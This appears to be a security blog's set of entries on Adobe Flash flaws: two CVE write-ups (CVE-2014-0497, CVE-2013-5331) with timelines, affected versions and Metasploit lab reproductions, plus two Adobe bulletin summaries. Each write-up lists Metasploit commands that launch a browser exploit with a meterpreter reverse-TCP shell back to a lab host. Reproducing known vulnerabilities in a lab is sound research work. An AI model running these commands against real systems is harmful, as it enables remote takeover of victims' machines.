CVE-2014-0497 Adobe Flash Player Integer Underflow Remote Code Execution

Timeline :

Vulnerability discovered exploited in the wild the 2014-02
Patched by the vendor via APSB14-04 the 2014-02-04
Vulnerability reported integrated into exploit kits the 2014-02
Metasploit PoC provided the 2014–05-04

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2014-0497
BID-65327
APSB14-04

Affected version(s) :

Adobe Flash Player 12.0.0.43 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.335 and earlier versions for Linux

Tested on :

with Flash Player 11.7.700.202 Active X version (flashplayer11_7r700_202_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an integer underflow in several avm2 instructions, which can be turned into remote code execution under the context of the user, as exploited in the wild in February 2014. This module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes rop chains for several Flash 11 versions, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_avm2
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-5331 Adobe Flash Player Type Confusion Remote Code Execution

Timeline :

Vulnerability discovered exploited in the wild the 2013-11
Patched by the vendor via APSB13-28 the 2013-12-10
Metasploit PoC provided the 2014–04-27

PoC provided by :

Unknown
bannedit
juan vazquez

Reference(s) :

CVE-2013-5331
BID-64199
APSB13-28

Affected version(s) :

Adobe Flash Player 11.9.900.152 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.327 and earlier versions for Linux

Tested on :

with Flash Player 11.9.900.152 Active X version (flashplayer11_9r900_152_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 over Windows XP SP3 and Windows 7 SP1.

Commands :

use exploit/windows/browser/adobe_flash_filters_type_confusion
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

APSB15-32 – Adobe Flash December 2015 Security Bulletin Review

Adobe has release, the December 8th 2015, during his December Patch Tuesday, one Adobe Flash security bulletin dealing with 77 vulnerabilities. This security bulletin has a Critical severity rating.

APSB15-32 is concerning:

  • Adobe Flash Player Desktop Runtime 19.0.0.245 and earlier on Windows and Macintosh
  • Adobe Flash Player Extended Support Release 18.0.0.261 and earlier on Windows and Macintosh
  • Adobe Flash Player for Google Chrome 19.0.0.245 and earlier on Windows, Macintosh, Linux and ChromeOS
  • Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.245 and earlier on Windows 10
  • Adobe Flash Player for Internet Explorer 10 and 11 19.0.0.245 and earlier on Windows 8.0 and 8.1
  • Adobe Flash Player for Linux 11.2.202.548 and earlier on Linux
  • AIR Desktop Runtime 19.0.0.241 and earlier on Windows and Macintosh
  • AIR SDK 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR SDK & Compiler 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR for Android

APSB13-16 – Adobe Flash June 2013 Security Bulletin Review

Adobe has release, the June 11th 2013, during his June Patch Tuesday, one Adobe Flash security bulletin dealing with one vulnerability. This security bulletin has a Critical severity rating. The associated vulnerability has a 10.0 CVSS base score.

APSB13-16 – Adobe Flash June 2013 Security Bulletin Review

APSB13-16 is concerning :

  • Adobe Flash Player 11.7.700.202 and earlier versions for Windows
  • Adobe Flash Player 11.7.700.203 and earlier versions for Macintosh
  • Adobe Flash Player 11.2.202.285 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.58 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.54 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.7.0.1860 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.7.0.1860 and earlier versions for Android
  • Adobe AIR 3.7.0.1860 SDK & Compiler and earlier versions

CVE-2013-3343 (10.0 CVSS base score), was discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.